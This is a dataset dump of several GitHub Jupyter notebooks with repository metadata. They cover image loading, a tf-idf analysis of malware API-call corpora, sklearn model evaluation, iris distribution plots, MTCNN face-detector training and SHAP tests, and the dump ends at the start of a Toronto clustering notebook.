hexsha
stringlengths 40
40
| size
int64 6
14.9M
| ext
stringclasses 1
value | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 6
260
| max_stars_repo_name
stringlengths 6
119
| max_stars_repo_head_hexsha
stringlengths 40
41
| max_stars_repo_licenses
list | max_stars_count
int64 1
191k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 6
260
| max_issues_repo_name
stringlengths 6
119
| max_issues_repo_head_hexsha
stringlengths 40
41
| max_issues_repo_licenses
list | max_issues_count
int64 1
67k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 6
260
| max_forks_repo_name
stringlengths 6
119
| max_forks_repo_head_hexsha
stringlengths 40
41
| max_forks_repo_licenses
list | max_forks_count
int64 1
105k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | avg_line_length
float64 2
1.04M
| max_line_length
int64 2
11.2M
| alphanum_fraction
float64 0
1
| cells
list | cell_types
list | cell_type_groups
list |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
cb0096d3eea07ff7d0cb29009d927dd78daa5b63 | 710,854 | ipynb | Jupyter Notebook | Python/3 Transforms.ipynb | MoctarHaiz/Codes | ef1f4689f8321212b9021850461973f2671a8dc0 | [
"MIT"
] | null | null | null | Python/3 Transforms.ipynb | MoctarHaiz/Codes | ef1f4689f8321212b9021850461973f2671a8dc0 | [
"MIT"
] | null | null | null | Python/3 Transforms.ipynb | MoctarHaiz/Codes | ef1f4689f8321212b9021850461973f2671a8dc0 | [
"MIT"
] | null | null | null | 12,048.372881 | 709,720 | 0.964379 | [
[
[
"from PIL import Image\nimg = Image.open('Resources/Images/bobby.jpg')\n#img.show()\nimg",
"_____no_output_____"
]
]
] | [
"code"
] | [
[
"code"
]
] |
cb00a298fa9a80b4cd075d037ed79434b1240036 | 19,998 | ipynb | Jupyter Notebook | prepare_corpus.ipynb | kbrezinski/GAT-Malware | 2fdbb9a8548d2efd338413469c0861560df02f72 | [
"BSD-3-Clause"
] | null | null | null | prepare_corpus.ipynb | kbrezinski/GAT-Malware | 2fdbb9a8548d2efd338413469c0861560df02f72 | [
"BSD-3-Clause"
] | 1 | 2021-12-27T20:16:27.000Z | 2021-12-27T20:16:27.000Z | prepare_corpus.ipynb | kbrezinski/GAT-Malware | 2fdbb9a8548d2efd338413469c0861560df02f72 | [
"BSD-3-Clause"
] | null | null | null | 30.027027 | 162 | 0.312831 | [
[
[
"%load_ext autoreload\n%autoreload 2|",
"_____no_output_____"
],
[
"import os\nimport pickle\n\nfrom utils.config import *",
"_____no_output_____"
],
[
"event = 'thread'\nfile = os.path.join(SANDY_ATTR_PATH, f'corpus.{event}.pkl')\n\ncorpus = pickle.load(open(file, \"rb\" ))\nattr = pickle.load(open(os.path.join(SANDY_ATTR_PATH, f'attr.{event}.pkl'), \"rb\" ))\ntargets = attr['target_arr']",
"_____no_output_____"
],
[
"print(len(corpus))\n\n# 8 Malware executions\n\nsumm = 0\nfor exe in attr['target_arr']:\n summ += len(exe)\n\n#attr['target_arr']",
"458\n"
],
[
"import pandas as pd\nimport numpy as np\n\ndf = pd.DataFrame(corpus, columns=['APIs'])\ndf['target'] = np.concatenate(attr['target_arr'])\ndf",
"_____no_output_____"
],
[
"from sklearn.feature_extraction.text import CountVectorizer\n\nvectorizer = CountVectorizer()\nX = vectorizer.fit_transform(df['APIs']).toarray()\ndf2 = pd.DataFrame(X)\ndf2[df2.any(axis=1)]",
"_____no_output_____"
],
[
"from sklearn.feature_extraction.text import TfidfVectorizer, CountVectorizer\nfrom sklearn.decomposition import PCA, SparsePCA, TruncatedSVD\n\nngram = (1, 4)\nmin_df = 2\nn = 2\n\ndef generate_ngrams(corpus, ngram=None, min_df=2, n=2):\n \n if isinstance(ngram, tuple):\n start, finish = 1, 1\n else:\n start, finish = 4, 4\n \n for i in range(start):\n for j in range(i, finish):\n \n ngram = (i + 1, j + 1)# if ngram is None else ngram\n print(ngram)\n # idf vectorizer\n vectorizer = TfidfVectorizer(ngram_range=ngram, min_df=min_df)\n \n # ngram vectorizer\n #vectorizer = CountVectorizer(ngram_range=ngram, min_df=2)\n\n vec = vectorizer.fit_transform(corpus)\n print(f\"vec shape: {vec.shape}\")\n svd = TruncatedSVD(n_components=n, n_iter=5).fit(vec)\n var = svd.explained_variance_ratio_\n print(f\"NGRAM {i+1}:{j+1} VARIANCE SUM | {svd.explained_variance_ratio_.sum():.3f}\")\n x_transformed = svd.transform(vec)\n \n return x_transformed, var\n \nvec, var = generate_ngrams(corpus, ngram=None, min_df=min_df, n=n)",
"_____no_output_____"
],
[
"import matplotlib.pyplot as plt\n\nfig = plt.figure()\nax = fig.add_subplot(111)\n\ntarget_flat = [item for sublist in targets for item in sublist]\n\nfor i in range(len(vec)):\n ax.scatter(vec[i, 0], vec[i, 1], color='red' if target_flat[i] == 1 else 'green', alpha=0.5)\n \nax.set_xlabel(f'PC1 ({var[0]*100:.1f}%)', fontsize=15)\nax.set_ylabel(f'PC2 ({var[1]*100:.1f}%)', fontsize=15)\n#ax.set_title(f'ngram={str(ngram)} | n_components={str(n)}', fontsize=15)\n\nax.grid(True)\nfig.tight_layout()\nplt.savefig(\"thread-14-2.png\", bbox_inches='tight', dpi=150)\n \nplt.show()",
"_____no_output_____"
],
[
"import matplotlib.pyplot as plt\n\n#for graph in master_g[1]:\ngraph = master_g[4]\n\nnode_color = ['red' if g[1].get('target', 0) == 1 else 'green' for g in graph.nodes(data=True)]\nnode_name = {g[0] : g[1].get('name', 0) for g in graph.nodes(data=True)}\n\nnx.draw(graph, pos=nx.spring_layout(graph, k=0.4), with_labels=True, node_color=node_color, labels=node_name, font_weight='bold', node_size=30, font_size=8)",
"_____no_output_____"
]
]
] | [
"code"
] | [
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
cb00a451fa6aa51bc838996ac6a0aede21bca3af | 29,197 | ipynb | Jupyter Notebook | Machine Learning Cookbook/Chapter 11 Model Evaluation.ipynb | sonwanesuresh95/Books-to-notebooks | 7e56d31395cfda258baefa93d5181839d1a829dc | [
"MIT"
] | 1 | 2021-03-09T06:22:46.000Z | 2021-03-09T06:22:46.000Z | Machine Learning Cookbook/Chapter 11 Model Evaluation.ipynb | sonwanesuresh95/Books-to-notebooks | 7e56d31395cfda258baefa93d5181839d1a829dc | [
"MIT"
] | null | null | null | Machine Learning Cookbook/Chapter 11 Model Evaluation.ipynb | sonwanesuresh95/Books-to-notebooks | 7e56d31395cfda258baefa93d5181839d1a829dc | [
"MIT"
] | null | null | null | 66.812357 | 14,816 | 0.828887 | [
[
[
"import numpy as np\nimport sklearn\nfrom sklearn import datasets\nimport matplotlib.pyplot as plt",
"_____no_output_____"
],
[
"mnist = sklearn.datasets.load_digits()",
"_____no_output_____"
],
[
"X = mnist.data\ny = mnist.target",
"_____no_output_____"
],
[
"from sklearn.preprocessing import StandardScaler",
"_____no_output_____"
],
[
"X = StandardScaler().fit_transform(X)",
"_____no_output_____"
],
[
"from sklearn.linear_model import LogisticRegression",
"_____no_output_____"
],
[
"logreg = LogisticRegression()",
"_____no_output_____"
],
[
"from sklearn.model_selection import KFold, cross_val_score",
"_____no_output_____"
],
[
"kf = KFold(n_splits=5, shuffle=True)",
"_____no_output_____"
],
[
"crv_scores = cross_val_score(logreg,\n X,\n y,\n cv=kf,\n scoring='accuracy',\n n_jobs=-1)",
"_____no_output_____"
],
[
"crv_scores.mean()",
"_____no_output_____"
]
],
[
[
"# ROC curve",
"_____no_output_____"
]
],
[
[
"from sklearn.datasets import make_classification",
"_____no_output_____"
],
[
"features,target = make_classification(n_samples=10000,\n n_features=10,\n n_classes=2,\n n_informative=3,\n random_state=3)",
"_____no_output_____"
],
[
"from sklearn.model_selection import train_test_split",
"_____no_output_____"
],
[
"X_train,X_test, y_train, y_test = train_test_split(features,target, test_size=0.2)",
"_____no_output_____"
],
[
"from sklearn.linear_model import LogisticRegression",
"_____no_output_____"
],
[
"logreg = LogisticRegression().fit(X_train,y_train)",
"_____no_output_____"
],
[
"from sklearn.metrics import accuracy_score, roc_auc_score, roc_curve",
"_____no_output_____"
],
[
"accuracy_score(logreg.predict(X_test),y_test)",
"_____no_output_____"
],
[
"target_probs = logreg.predict_proba(X_test)",
"_____no_output_____"
],
[
"target_probs = target_probs[:,1]",
"_____no_output_____"
],
[
"y_test.shape, target_probs.shape",
"_____no_output_____"
],
[
"fpr,tpr,threshold = roc_curve(y_test,target_probs)",
"_____no_output_____"
],
[
"plt.plot(fpr,tpr,label='logreg')\nplt.plot([0,1],linestyle='--',label='baseline')\nplt.plot([0,0],[0,1],c='green',label='ideal')\nplt.plot([0,1],[1,1],c='green')\nplt.grid(True)\nplt.legend()\nplt.gca().set_ylim(0,1.006)\nplt.gca().set_xlim(-0.006,1)",
"_____no_output_____"
]
],
[
[
"# Visualizing confusion matrix",
"_____no_output_____"
]
],
[
[
"iris = sklearn.datasets.load_iris()",
"_____no_output_____"
],
[
"X = iris.data\ny = iris.target",
"_____no_output_____"
],
[
"X_train, X_test, y_train,y_test = train_test_split(X,y,test_size=0.1)",
"_____no_output_____"
],
[
"clf = LogisticRegression()",
"_____no_output_____"
],
[
"preds = clf.fit(X_train,y_train).predict(X_test)",
"_____no_output_____"
],
[
"from sklearn.metrics import confusion_matrix",
"_____no_output_____"
],
[
"conf = confusion_matrix(y_test,preds)",
"_____no_output_____"
],
[
"import seaborn as sns",
"_____no_output_____"
],
[
"sns.heatmap(conf,annot=True,cmap='Blues')",
"_____no_output_____"
]
]
] | [
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
cb00a4ae7718ea9215d93e902526258b67224192 | 54,677 | ipynb | Jupyter Notebook | Labs/Lab2/Heenal/PDF_CDF.ipynb | heenalsapovadia/ml_practices_2018 | 77f30c14cd585ab71667e2a2c7e9e69c0de2b97c | [
"Apache-2.0"
] | 1 | 2020-04-23T04:05:43.000Z | 2020-04-23T04:05:43.000Z | Labs/Lab2/Heenal/PDF_CDF.ipynb | heenalsapovadia/ml_practices_2018 | 77f30c14cd585ab71667e2a2c7e9e69c0de2b97c | [
"Apache-2.0"
] | 1 | 2019-03-20T12:13:42.000Z | 2019-03-20T12:13:42.000Z | Labs/Lab2/Heenal/PDF_CDF.ipynb | heenalsapovadia/ml_practices_2018 | 77f30c14cd585ab71667e2a2c7e9e69c0de2b97c | [
"Apache-2.0"
] | 2 | 2018-12-21T07:22:17.000Z | 2018-12-27T12:14:55.000Z | 148.983651 | 22,544 | 0.865282 | [
[
[
"%matplotlib inline\n# Importing the necessary libraries\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns",
"_____no_output_____"
],
[
"# loading the data\niris = sns.load_dataset('iris')\niris.head()",
"_____no_output_____"
],
[
"iris.species.unique()",
"_____no_output_____"
],
[
"class_data = iris[iris.species == 'versicolor']",
"_____no_output_____"
],
[
"class_data.head()",
"_____no_output_____"
],
[
"counts,bin_edges = np.histogram(class_data.petal_length)\n\npdf = counts.astype(float)/sum(counts)\ncdf = np.cumsum(pdf)\n\nsns.lineplot(bin_edges[1:], pdf)\nsns.lineplot(bin_edges[1:], cdf)",
"_____no_output_____"
],
[
"sns.FacetGrid(iris, hue='species', size=5).map(sns.distplot, 'petal_length').add_legend()",
"/home/heenal/anaconda2/lib/python2.7/site-packages/seaborn/axisgrid.py:230: UserWarning: The `size` paramter has been renamed to `height`; please update your code.\n warnings.warn(msg, UserWarning)\n"
],
[
"sns.boxplot(iris.species, iris.petal_length)",
"_____no_output_____"
]
]
] | [
"code"
] | [
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
cb00acc64f6ea0cec410967ca523215fc333d334 | 24,494 | ipynb | Jupyter Notebook | train_pnet/train_Pnet.ipynb | ysf465639310/PYTORCH_MTCNN | ca809e2867ff70fb63d3fe3dc6c6efd615a4e223 | [
"MIT"
] | 2 | 2020-05-21T09:14:21.000Z | 2021-01-23T14:50:31.000Z | train_pnet/train_Pnet.ipynb | ysf465639310/PYTORCH_MTCNN | ca809e2867ff70fb63d3fe3dc6c6efd615a4e223 | [
"MIT"
] | null | null | null | train_pnet/train_Pnet.ipynb | ysf465639310/PYTORCH_MTCNN | ca809e2867ff70fb63d3fe3dc6c6efd615a4e223 | [
"MIT"
] | 1 | 2020-07-17T18:40:06.000Z | 2020-07-17T18:40:06.000Z | 55.668182 | 226 | 0.592717 | [
[
[
"##### 训练PNet",
"_____no_output_____"
]
],
[
[
"#导入公共文件\nimport os\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport torch.nn.functional as F\nimport torchvision\nimport torchvision.transforms as transforms\nfrom torch.autograd import Variable\n\nimport sys\nsys.path.append('../')\n\n# add other package\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom sklearn.metrics import confusion_matrix\nfrom tool.plotcm import plot_confusion_matrix\n\nimport pdb\n\nfrom collections import OrderedDict\nfrom collections import namedtuple\nfrom itertools import product\n\n#torch.set_printoptions(linewidth=120)\n\nfrom mtcnn.PNet import PNet\n\nfrom mtcnn.mtcnn import RunBuilder\n\nfrom mtcnn.LossFn import LossFn\n\nfrom tool.imagedb import ImageDB\n\nfrom tool.imagedb import TrainImageReader\n\nfrom tool import image_tools\n\nimport datetime\n\ntorch.set_grad_enabled(True)\n",
"tensor([ 0.8875, -1.8204, 0.9606, -0.4746])\ntorch.Size([4, 3, 12, 12])\nb tensor([0.5551, 0.5520, 0.5659, 0.5395], grad_fn=<SqueezeBackward0>)\na: tensor([True, True, True, True])\nc tensor([0.5551, 0.5520, 0.5659, 0.5395], grad_fn=<MaskedSelectBackward>)\nc tensor([True, True, True, True])\ntensor([-0.6575, -1.0597, 1.4862, -0.6248])\ntorch.Size([4, 3, 12, 12])\nb tensor([0.5767, 0.5802, 0.5421, 0.5395], grad_fn=<SqueezeBackward0>)\na: tensor([True, True, True, True])\nc tensor([0.5767, 0.5802, 0.5421, 0.5395], grad_fn=<MaskedSelectBackward>)\nc tensor([True, True, True, True])\nRnet out label shape: torch.Size([4, 2])\nRnet out offset shape: torch.Size([4, 4])\na torch.Size([4, 2])\ntorch.Size([4, 3, 48, 48])\nRnet out label shape: torch.Size([4, 2])\nRnet out offset shape: torch.Size([4, 4])\nRnet out offset shape: torch.Size([4, 10])\n"
],
[
"def compute_accuracy(prob_cls, gt_cls):\n\n prob_cls = torch.squeeze(prob_cls)\n \n gt_cls = torch.squeeze(gt_cls)\n\n #we only need the detection which >= 0\n mask = torch.ge(gt_cls,0)\n #get valid element\n valid_gt_cls = torch.masked_select(gt_cls,mask)\n \n valid_prob_cls = torch.masked_select(prob_cls,mask)\n \n size = min(valid_gt_cls.size()[0], valid_prob_cls.size()[0])\n \n prob_ones = torch.ge(valid_prob_cls,0.6).float()\n \n right_ones = torch.eq(prob_ones,valid_gt_cls).float()\n \n #cms = confusion_matrix(prob_ones,right_ones,[0,1])\n \n #print(cms)\n \n #names = ('0','1')\n \n #plot_confusion_matrix(cms, names)\n \n #print(prob_cls.shape,gt_cls.shape,valid_prob_cls.shape,right_ones.shape)\n\n ## if size == 0 meaning that your gt_labels are all negative, landmark or part\n return torch.div(torch.mul(torch.sum(right_ones),float(1.0)),float(size)) \n ## divided by zero meaning that your gt_labels are all negative, landmark or part",
"_____no_output_____"
],
[
"#annotation_file = './image/imglist_anno_12.txt'\nannotation_file = '../image/12/imglist_anno_12.txt' #'./image/wider_face/wider_face_train_bbx_gt.txt' #'./image/anno_train.txt'\n\nmodel_store_path = '../model/Pnet'\n\nparams = OrderedDict(\n lr = [.01]\n ,batch_size = [2000]\n #,device = [\"cuda\", \"cpu\"]\n ,shuffle = [True]\n)\n\nend_epoch = 10\n\nfrequent = 10\n\n#runs = RunBuilder.get_runs(params)",
"_____no_output_____"
],
[
"def train_net(imdb=None):\n \n if imdb == None:\n imagedb = ImageDB(annotation_file)\n imdb = imagedb.load_imdb()\n #print(imdb.num_images)\n imdb = imagedb.append_flipped_images(imdb)\n \n for run in RunBuilder.get_runs(params):\n #create model path\n if not os.path.exists(model_store_path):\n os.makedirs(model_store_path)\n \n #create data_loader\n train_data=TrainImageReader(imdb,12,batch_size=run.batch_size,shuffle=run.shuffle)\n \n #print(train_data.data[0].shape,len(train_data.data))\n #Sprint(train_data.label[0][0])\n \n acc=0.0\n \n comment = f'-{run}'\n \n lossfn = LossFn()\n \n network = PNet()\n \n optimizer = torch.optim.Adam(network.parameters(), lr=run.lr)\n \n for epoch in range(end_epoch):\n train_data.reset() # shuffle\n epoch_acc = 0.0\n #for batch_idx,(image,(gt_label,gt_bbox,gt_landmark))in enumerate(train_dat)\n for batch_idx,(image,(gt_label,gt_bbox,gt_landmark))in enumerate(train_data):\n \n im_tensor = [ image_tools.convert_image_to_tensor(image[i,:,:,:]) for i in range(image.shape[0]) ]\n im_tensor = torch.stack(im_tensor)\n\n im_tensor = Variable(im_tensor)\n gt_label = Variable(torch.from_numpy(gt_label).float())\n\n gt_bbox = Variable(torch.from_numpy(gt_bbox).float())\n #gt_landmark = Variable(torch.from_numpy(gt_landmark).float())\n \n cls_pred, box_offset_pred = network(im_tensor)\n \n cls_loss = lossfn.cls_loss(gt_label,cls_pred)\n \n box_offset_loss = lossfn.box_loss(gt_label,gt_bbox,box_offset_pred)\n \n all_loss = cls_loss*1.0+box_offset_loss*0.5\n \n if batch_idx%frequent==0:\n accuracy=compute_accuracy(cls_pred,gt_label)\n accuracy=compute_accuracy(cls_pred,gt_label)\n show1 = accuracy.data.cpu().numpy()\n show2 = cls_loss.data.cpu().numpy()\n show3 = box_offset_loss.data.cpu().numpy()\n # show4 = landmark_loss.data.cpu().numpy()\n show5 = all_loss.data.cpu().numpy()\n print(\"%s : Epoch: %d, Step: %d, accuracy: %s, det loss: %s, bbox loss: %s, all_loss: %s, lr:%s \"%\n (datetime.datetime.now(),epoch,batch_idx, show1,show2,show3,show5,run.lr))\n epoch_acc = show1\n #计算偏差矩阵\n optimizer.zero_grad()\n all_loss.backward()\n optimizer.step()\n pass\n \n pass \n print('save modle acc:', epoch_acc)\n torch.save(network.state_dict(), os.path.join(model_store_path,\"pnet_epoch_%d.pt\" % epoch))\n torch.save(network, os.path.join(model_store_path,\"pnet_epoch_model_%d.pkl\" % epoch))\n pass\n \n pass\npass",
"_____no_output_____"
],
[
"if __name__ == '__main__':\n print('train Pnet Process:...')\n #加载图片文件\n #imagedb = ImageDB(annotation_file,'./image/train')\n #gt_imdb = imagedb.load_imdb()\n #gt_imdb = imagedb.append_flipped_images(gt_imdb)\n train_net()\n \n print('finish....')\n #print(gt_imdb[2])",
"train Pnet Process:...\nappend flipped images to imdb 72129\n2020-05-21 23:53:50.921667 : Epoch: 0, Step: 0, accuracy: 0.57535696, det loss: 0.88428044, bbox loss: 0.18741345, all_loss: 0.9779872, lr:0.01 \n2020-05-21 23:53:59.577856 : Epoch: 0, Step: 10, accuracy: 0.94787234, det loss: 0.18041657, bbox loss: 0.046751834, all_loss: 0.20379248, lr:0.01 \n2020-05-21 23:54:08.230471 : Epoch: 0, Step: 20, accuracy: 0.95137423, det loss: 0.16063786, bbox loss: 0.036383662, all_loss: 0.17882968, lr:0.01 \n2020-05-21 23:54:17.165781 : Epoch: 0, Step: 30, accuracy: 0.95741326, det loss: 0.14517276, bbox loss: 0.039338004, all_loss: 0.16484176, lr:0.01 \n2020-05-21 23:54:25.829193 : Epoch: 0, Step: 40, accuracy: 0.9542827, det loss: 0.15249781, bbox loss: 0.040936694, all_loss: 0.17296615, lr:0.01 \n2020-05-21 23:54:34.305235 : Epoch: 0, Step: 50, accuracy: 0.95531917, det loss: 0.14326507, bbox loss: 0.047609273, all_loss: 0.1670697, lr:0.01 \n2020-05-21 23:54:42.793345 : Epoch: 0, Step: 60, accuracy: 0.9514512, det loss: 0.1465687, bbox loss: 0.03774166, all_loss: 0.16543953, lr:0.01 \n2020-05-21 23:54:51.226672 : Epoch: 0, Step: 70, accuracy: 0.94736844, det loss: 0.14733544, bbox loss: 0.03899685, all_loss: 0.16683386, lr:0.01 \nsave modle acc: 0.94736844\n"
]
]
] | [
"markdown",
"code"
] | [
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code"
]
] |
cb00ae01ef5acbc785185fd2f4bc594cf52280a2 | 8,022 | ipynb | Jupyter Notebook | notebooks/deep_explainer/Explain Multiply and Division Models defined in Tensorflow.ipynb | ekrim/shap | 672e44f5d1f6ce808796b35be0dd0a75c2c3c9ed | [
"MIT"
] | null | null | null | notebooks/deep_explainer/Explain Multiply and Division Models defined in Tensorflow.ipynb | ekrim/shap | 672e44f5d1f6ce808796b35be0dd0a75c2c3c9ed | [
"MIT"
] | null | null | null | notebooks/deep_explainer/Explain Multiply and Division Models defined in Tensorflow.ipynb | ekrim/shap | 672e44f5d1f6ce808796b35be0dd0a75c2c3c9ed | [
"MIT"
] | null | null | null | 28.548043 | 99 | 0.417477 | [
[
[
"import shap\nimport tensorflow as tf\nimport numpy as np\nfrom sklearn import datasets\nfrom sklearn.model_selection import train_test_split\n\nRANDOM_SEED = 42\ntf.set_random_seed(RANDOM_SEED)\n\ndef get_iris_data():\n iris = datasets.load_iris()\n data = iris[\"data\"]\n target = iris[\"target\"]\n # Prepend the column of 1s for bias\n N, M = data.shape\n all_X = np.ones((N, M + 1))\n all_X[:, 1:] = data\n # Convert into one-hot vectors\n num_labels = len(np.unique(target))\n all_Y = np.eye(num_labels)[target] # One liner trick!\n return train_test_split(all_X, all_Y, test_size=0.33, random_state=RANDOM_SEED)",
"_____no_output_____"
]
],
[
[
"# Example that generates nans",
"_____no_output_____"
]
],
[
[
"train_X, test_X,_,_ = get_iris_data()\n# train_X = train_X[:,1:5]\n# test_X = test_X[:,1:5]\ninds = np.random.choice(train_X.shape[0], 3, replace=False)\ndata = train_X[inds,:]\ntest_in = test_X[10:11,:]\nx_size = train_X.shape[1] # Number of input nodes: 4 features and 1 bias\nX = tf.placeholder(\"float\", shape=[None, x_size])",
"_____no_output_____"
],
[
"print(train_X)",
"[[1. 5.7 2.9 4.2 1.3]\n [1. 7.6 3. 6.6 2.1]\n [1. 5.6 3. 4.5 1.5]\n [1. 5.1 3.5 1.4 0.2]\n [1. 7.7 2.8 6.7 2. ]\n [1. 5.8 2.7 4.1 1. ]\n [1. 5.2 3.4 1.4 0.2]\n [1. 5. 3.5 1.3 0.3]\n [1. 5.1 3.8 1.9 0.4]\n [1. 5. 2. 3.5 1. ]\n [1. 6.3 2.7 4.9 1.8]\n [1. 4.8 3.4 1.9 0.2]\n [1. 5. 3. 1.6 0.2]\n [1. 5.1 3.3 1.7 0.5]\n [1. 5.6 2.7 4.2 1.3]\n [1. 5.1 3.4 1.5 0.2]\n [1. 5.7 3. 4.2 1.2]\n [1. 7.7 3.8 6.7 2.2]\n [1. 4.6 3.2 1.4 0.2]\n [1. 6.2 2.9 4.3 1.3]\n [1. 5.7 2.5 5. 2. ]\n [1. 5.5 4.2 1.4 0.2]\n [1. 6. 3. 4.8 1.8]\n [1. 5.8 2.7 5.1 1.9]\n [1. 6. 2.2 4. 1. ]\n [1. 5.4 3. 4.5 1.5]\n [1. 6.2 3.4 5.4 2.3]\n [1. 5.5 2.3 4. 1.3]\n [1. 5.4 3.9 1.7 0.4]\n [1. 5. 2.3 3.3 1. ]\n [1. 6.4 2.7 5.3 1.9]\n [1. 5. 3.3 1.4 0.2]\n [1. 5. 3.2 1.2 0.2]\n [1. 5.5 2.4 3.8 1.1]\n [1. 6.7 3. 5. 1.7]\n [1. 4.9 3.1 1.5 0.1]\n [1. 5.8 2.8 5.1 2.4]\n [1. 5. 3.4 1.5 0.2]\n [1. 5. 3.5 1.6 0.6]\n [1. 5.9 3.2 4.8 1.8]\n [1. 5.1 2.5 3. 1.1]\n [1. 6.9 3.2 5.7 2.3]\n [1. 6. 2.7 5.1 1.6]\n [1. 6.1 2.6 5.6 1.4]\n [1. 7.7 3. 6.1 2.3]\n [1. 5.5 2.5 4. 1.3]\n [1. 4.4 2.9 1.4 0.2]\n [1. 4.3 3. 1.1 0.1]\n [1. 6. 2.2 5. 1.5]\n [1. 7.2 3.2 6. 1.8]\n [1. 4.6 3.1 1.5 0.2]\n [1. 5.1 3.5 1.4 0.3]\n [1. 4.4 3. 1.3 0.2]\n [1. 6.3 2.5 4.9 1.5]\n [1. 6.3 3.4 5.6 2.4]\n [1. 4.6 3.4 1.4 0.3]\n [1. 6.8 3. 5.5 2.1]\n [1. 6.3 3.3 6. 2.5]\n [1. 4.7 3.2 1.3 0.2]\n [1. 6.1 2.9 4.7 1.4]\n [1. 6.5 2.8 4.6 1.5]\n [1. 6.2 2.8 4.8 1.8]\n [1. 7. 3.2 4.7 1.4]\n [1. 6.4 3.2 5.3 2.3]\n [1. 5.1 3.8 1.6 0.2]\n [1. 6.9 3.1 5.4 2.1]\n [1. 5.9 3. 4.2 1.5]\n [1. 6.5 3. 5.2 2. ]\n [1. 5.7 2.6 3.5 1. ]\n [1. 5.2 2.7 3.9 1.4]\n [1. 6.1 3. 4.6 1.4]\n [1. 4.5 2.3 1.3 0.3]\n [1. 6.6 2.9 4.6 1.3]\n [1. 5.5 2.6 4.4 1.2]\n [1. 5.3 3.7 1.5 0.2]\n [1. 5.6 3. 4.1 1.3]\n [1. 7.3 2.9 6.3 1.8]\n [1. 6.7 3.3 5.7 2.1]\n [1. 5.1 3.7 1.5 0.4]\n [1. 4.9 2.4 3.3 1. ]\n [1. 6.7 3.3 5.7 2.5]\n [1. 7.2 3. 5.8 1.6]\n [1. 4.9 3.1 1.5 0.1]\n [1. 6.7 3.1 5.6 2.4]\n [1. 4.9 3. 1.4 0.2]\n [1. 6.9 3.1 4.9 1.5]\n [1. 7.4 2.8 6.1 1.9]\n [1. 6.3 2.9 5.6 1.8]\n [1. 5.7 2.8 4.1 1.3]\n [1. 6.5 3. 5.5 1.8]\n [1. 6.3 2.3 4.4 1.3]\n [1. 6.4 2.9 4.3 1.3]\n [1. 5.6 2.8 4.9 2. ]\n [1. 5.9 3. 5.1 1.8]\n [1. 5.4 3.4 1.7 0.2]\n [1. 6.1 2.8 4. 1.3]\n [1. 4.9 2.5 4.5 1.7]\n [1. 5.8 4. 1.2 0.2]\n [1. 5.8 2.6 4. 1.2]\n [1. 7.1 3. 5.9 2.1]]\n"
]
],
[
[
"### Multiplication",
"_____no_output_____"
]
],
[
[
"# yhat = tf.multiply(X[:,0:1],X)\n# yhat = tf.multiply(X,X[:,0:1])\nyhat = tf.multiply(X,X)\nmodel = (X,yhat)\ne = shap.DeepExplainer(model, data)\nshap_values = e.shap_values(test_in)\nsums = np.array([shap_values[i].sum() for i in range(len(shap_values))])\nsess = tf.Session()\ndiff = sess.run(model[1], feed_dict={model[0]: test_in})[0,:] - \\\n sess.run(model[1], feed_dict={model[0]: data}).mean(0)\nprint(sums)\nprint(diff)\nassert np.allclose(sums, diff, atol=1e-06), \"Sum of SHAP values does not match difference!\"",
"[ 0. 11.59333391 1.03666701 14.87333215 2.50333347]\n[ 0. 11.593332 1.0366669 14.87333 2.5033336]\n"
]
],
[
[
"### Division",
"_____no_output_____"
]
],
[
[
"# yhat = tf.div(X,X[:,0:1]) # These examples don't work\n# yhat = tf.div(X[:,0:1],X) # These examples don't work\n# yhat = tf.div(X[:,0:2],X[:,2:4])\nyhat = tf.div(X,X)\nmodel = (X,yhat)\ne = shap.DeepExplainer(model, data)\nshap_values = e.shap_values(test_in)\nsums = np.array([shap_values[i].sum() for i in range(len(shap_values))])\nsess = tf.Session()\ndiff = sess.run(model[1], feed_dict={model[0]: test_in})[0,:] - \\\n sess.run(model[1], feed_dict={model[0]: data}).mean(0)\nprint(sums)\nprint(diff)\nassert np.allclose(sums, diff, atol=1e-06), \"Sum of SHAP values does not match difference!\"",
"[0.00000000e+00 2.98023224e-09 9.93410746e-09 0.00000000e+00\n 0.00000000e+00]\n[0. 0. 0. 0. 0.]\n"
]
]
] | [
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
]
] |
cb00bfbe05b0351c17a62bef55a9b49b494304d7 | 335,421 | ipynb | Jupyter Notebook | Toronto.ipynb | Claudia-Perez-Ruisanchez/claudia-perez-ruisanchez.github.io | c0e2b2018c0a1abd2e0c5a411a01ce2a2ca2f02a | [
"Unlicense"
] | null | null | null | Toronto.ipynb | Claudia-Perez-Ruisanchez/claudia-perez-ruisanchez.github.io | c0e2b2018c0a1abd2e0c5a411a01ce2a2ca2f02a | [
"Unlicense"
] | null | null | null | Toronto.ipynb | Claudia-Perez-Ruisanchez/claudia-perez-ruisanchez.github.io | c0e2b2018c0a1abd2e0c5a411a01ce2a2ca2f02a | [
"Unlicense"
] | null | null | null | 79.767182 | 155,804 | 0.67268 | [
[
[
"## Segmenting and Clustering Neighborhoods in Toronto",
"_____no_output_____"
],
[
